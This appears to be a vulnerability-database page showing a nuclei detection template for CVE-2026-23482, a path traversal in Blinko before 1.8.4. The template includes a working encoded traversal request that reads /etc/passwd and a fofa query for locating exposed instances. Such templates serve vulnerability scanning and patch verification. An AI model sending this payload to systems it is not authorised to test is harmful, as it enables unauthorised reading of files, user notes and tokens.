Lucene search
K

Blinko < 1.8.4 - Path Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Blinko path traversal before 1.8.4 exposes notes and tokens via temp path; update to 1.8.4.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-23482
23 Mar 202620:25
attackerkb
Circl
CVE-2026-23482
23 Mar 202622:54
circl
CNNVD
Blinko 路径遍历漏洞
23 Mar 202600:00
cnnvd
CVE
CVE-2026-23482
23 Mar 202620:25
cve
Cvelist
CVE-2026-23482 Blinko: Unauthorized Arbitrary File Read - /api/file/temp
23 Mar 202620:25
cvelist
EUVD
EUVD-2026-14533
23 Mar 202620:25
euvd
NVD
CVE-2026-23482
23 Mar 202621:17
nvd
OSV
CVE-2026-23482 Blinko: Unauthorized Arbitrary File Read - /api/file/temp
23 Mar 202620:25
osv
Positive Technologies
PT-2026-27205
23 Mar 202600:00
ptsecurity
RedhatCVE
CVE-2026-23482
26 Mar 202615:03
redhatcve
Rows per page
id: CVE-2026-23482

info:
  name: Blinko < 1.8.4 - Path Traversal
  author: tx1ee
  severity: high
  description: |
    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.
  impact: |
    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
  remediation: |
    Update to version 1.8.4 or later
  reference:
    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-23482
    cwe-id: CWE-22
    epss-score: 0.01523
    epss-percentile: 0.71564
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/manifest.webmanifest"
      - "{{BaseURL}}/manifest.json"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "Blinko"
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203d9e979d706821001bc4ccc614c142fa0cbde30159b458b5eeef29f1abcfb23f022100e17bce181d89da672f301efd5b7c4152bf2e9926903b8774aa13d0c564f55efe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2026 12:07Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
CVSS 48.2
EPSS0.01523
SSVC
7